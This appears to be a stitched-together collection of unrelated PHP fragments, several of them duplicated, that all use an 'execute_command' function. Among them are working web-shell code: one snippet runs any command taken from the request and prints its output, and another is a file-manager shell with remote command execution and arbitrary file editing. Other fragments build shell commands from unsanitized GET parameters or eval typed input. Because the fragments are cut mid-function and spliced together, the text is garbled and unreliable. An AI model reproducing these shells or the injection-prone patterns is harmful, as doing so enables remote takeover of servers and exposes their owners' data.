function get_program_path($program) { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $which = 'where'; } else { $which = '/usr/bin/which'; } $data = execute_command($which . ' ' . $program); if (!$data) { return false; } return !empty($data[0]) ? $data[0] : false; }
/** * Run an array of commands, substituting variables where appropriate. * * @param $commands * Array of CLI commands to be executed which may contain variables to * substitute. * @param $variables * An key/value array of variables which may be substituted into commands * before execution. */ function run_commands($commands, $variables) { foreach ($commands as $command) { try { $command = parse_command($command, $variables); print '>> ' . $command . PHP_EOL; $output = execute_command($command); foreach ($output as $line) { print $line . PHP_EOL; } } catch (Exception $e) { print $e->getMessage() . PHP_EOL; exit(1); } } }
do_refresh_button(); ?> <?php function execute_command($command = "") { if (isset($command) && !empty($command)) { $output = `{$command} 2>&1`; $output = htmlentities($output); print "<h2>{$command}</h2>"; print "<p><pre>{$output}</pre></p>"; print "<hr><p>Last update on "; print date(DATE_RFC822); print "</p>"; } } ?> <?php $command = $_REQUEST['command']; // grab user input execute_command($command); ?> <?php do_refresh_button(); ?> </body> </html>
$code = '$__rs = ' . $code; } if ($last_char !== ';' && $last_char !== '}') { $code .= ';'; } // var_dump($code); return array(null, $code); } function execute_command($cmd) { if ($cmd === 'quit') { exit; } } while (true) { echo "phpsh > "; $str = fread(STDIN, 1000); if (empty($str)) { continue; } list($cmd, $code) = complete_expr($str); if ($cmd) { execute_command($cmd); } elseif ($code) { eval($code); } if (isset($__rs)) { var_dump($__rs); unset($__rs); } }
function tfu_preview($file) { global $use_image_magic, $image_magic_path; $pdf_preview = false; if (file_exists(dirname(__FILE__) . '/thumbs') && is_writable(dirname(__FILE__) . '/thumbs')) { // is a caching dir available and writeable? $pdf_preview = true; } // we store the url of the last preview image in the session - use it if you need it ;). // we generate thumbs for jpge,png and gif! if (preg_match("/.*\\.(j|J)(p|P)(e|E){0,1}(g|G)\$/", $file) || preg_match("/.*\\.(p|P)(n|N)(g|G)\$/", $file) || preg_match("/.*\\.(g|G)(i|I)(f|F)\$/", $file)) { if (isset($_GET['big'])) { send_thumb($file, 90, 440, 280); // big preview 4x bigger! } else { send_thumb($file, 90, 80, 55); // small preview } } else { if (preg_match("/.*\\.(p|P)(d|D)(f|F)\$/", $file) && $use_image_magic && $pdf_preview) { $cachename = dirname(__FILE__) . '/thumbs/' . sha1($file) . '.jpg'; if (!file_exists($cachename)) { $ima = realpath($file); $resize = '1000x1000'; $command = $image_magic_path . ' "' . $ima . '[0]" -border 1x1 -quality 80 -thumbnail ' . $resize . ' "' . $cachename . '"'; execute_command($command); } if (isset($_GET['big'])) { send_thumb($cachename, 90, 440, 280); // big preview 4x bigger! } else { send_thumb($cachename, 90, 80, 55); // small preview } // the cleanup is done in the thumbs folder which is cleaned up regularly // @unlink($cachename); return; } else { return; // we return nothing if no image. } } }
$header .= ' [<a href="?p=' . $page . '&dir=' . realpath('.') . '">' . $page_name . '</a>] '; } $header .= '<br><hr>' . show_dirs('.') . '</td><tr><td>'; print $header; $footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // //Page handling // if (isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "<form action=\"" . $me . "?p=cmd&dir=" . $_GET['dir'] . "\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; if (isset($_REQUEST['command'])) { print "<pre>"; execute_command(get_execution_method(), $_REQUEST['command']); //You want fries with that? } break; case 'edit': //Edit a fie if (isset($_POST['editform'])) { $f = $_GET['file']; $fh = fopen($f, 'w') or print "Error while opening file!"; fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; fclose($fh); } print "Editing file <b>" . $_GET['file'] . "</b> (" . perm($_GET['file']) . ")<br><br><form action=\"" . $me . "?p=edit&file=" . $_GET['file'] . "\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; $rd = file($_GET['file']); foreach ($rd as $l) { print htmlspecialchars($l);
function execute_script($code, $location, $extension, $output_needed = False) { $filename = $_SESSION["daws_directory"] . "/" . time() . "." . $extension; write_to_file($filename, $code); $command = $location . " " . $filename; //run the script in background and redirect its output to null if ($output_needed == False) { //we have to make sure that the user doesn't care about the output since we're redirecting it to null if ($_SESSION["windows"] == True) { $command = "START /B {$command} > null"; } else { if (execute_command("nohup", True)) { //use nohup if installed $command = "nohup {$command} > /dev/null 2>&1 &"; } } } return execute_command($command); }
public function run($token, $environment, $command) { $result = $this->initialize($token, $environment); if ($result) { return $result; } $output = $command && !empty($command) ? execute_command($command) : ''; //if(mb_detect_encoding($output) !== 'UTF-8') { $output = mb_convert_encoding($output, 'UTF-8'); //} if ($output && substr($output, -1) == "\n") { $output = substr($output, 0, -1); } return array('output' => $output); }
header("Content-Type: application/json", true); echo '{"Message":"Error decoding JSON request"}'; exit; } } else { log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']); header("Content-Type: application/json", true); echo '{"Message":"Content-Type not set or invalid"}'; exit; } } if (isset($request['RequestMethod'])) { $command = trim($request['RequestMethod']); $gMethodName = $command; if ($gMethodName == 'GetGenerics') { $gMethodName .= ' (' . $request['Type'] . ')'; } execute_command($command, $capability, $db, $request); } else { log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true)); } exit; } else { log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']); header("Content-Type: application/json", true); echo '{"Message":"Unhandled request method"}'; exit; } } } }
function tfu_createThumb($file) { global $compression, $use_image_magic, $image_magic_path, $pdf_thumb_format; if (!preg_match("/.*\\.(p|P)(d|D)(f|F)\$/", $file)) { $name = removeExtension($file) . "-" . $_GET['tfu_width'] . 'x' . $_GET['tfu_height'] . "." . getExtension($file); resize_file($file, $_GET['tfu_width'] . 'x' . $_GET['tfu_height'], $compression, basename($file), $name); } else { if ($use_image_magic) { $name = dirname(__FILE__) . '/' . removeExtension($file) . "-" . $_GET['tfu_width'] . '.' . $pdf_thumb_format; // create a pdf thumbnail $ima = realpath($file); if (!file_exists($name)) { $ima = realpath($file); $resize = $_GET['tfu_width'] . 'x' . $_GET['tfu_height']; $command = $image_magic_path . ' -colorspace rgb "' . $ima . '[0]" -border 1x1 -quality 80 -thumbnail ' . $resize . ' "' . $name . '"'; execute_command($command); } } } }
function execute_script($code, $location, $extension, $output_needed = False) { $filename = $_SESSION["daws_directory"] . "/" . rand(1, 1000) . "." . $extension; write_to_file($filename, $code); $command = $location . " " . $filename; //run the script in background and redirect its output to null if ($output_needed == False) { if ($_SESSION["windows"] == True) { $command = "START /B {$command} > null"; } else { if (execute_command("nohup", True)) { $command = "nohup {$command} > /dev/null 2>&1 &"; } } } return execute_command($command); }
public function run($token, $environment, $command) { $result = $this->initialize($token, $environment); if ($result) { return $result; } $output = $command && !empty($command) ? execute_command($command) : ''; if ($output && substr($output, -1) == "\n") { $output = substr($output, 0, -1); } return array('output' => $output); }
echo '{"Message":"Error decoding JSON request"}'; exit; } } else { log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']); header("Content-Type: application/json", true); echo '{"Message":"Content-Type not set or invalid"}'; exit; } } if (isset($request['RequestMethod'])) { $command = trim($request['RequestMethod']); $gMethodName = $command; if ($gMethodName == 'GetGenerics') { $gMethodName .= ' (' . $request['Type'] . ')'; } execute_command($command, $db, $request); } else { log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true)); } exit; } else { log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']); header("Content-Type: application/json", true); echo '{"Message":"Unhandled request method"}'; exit; } } } } }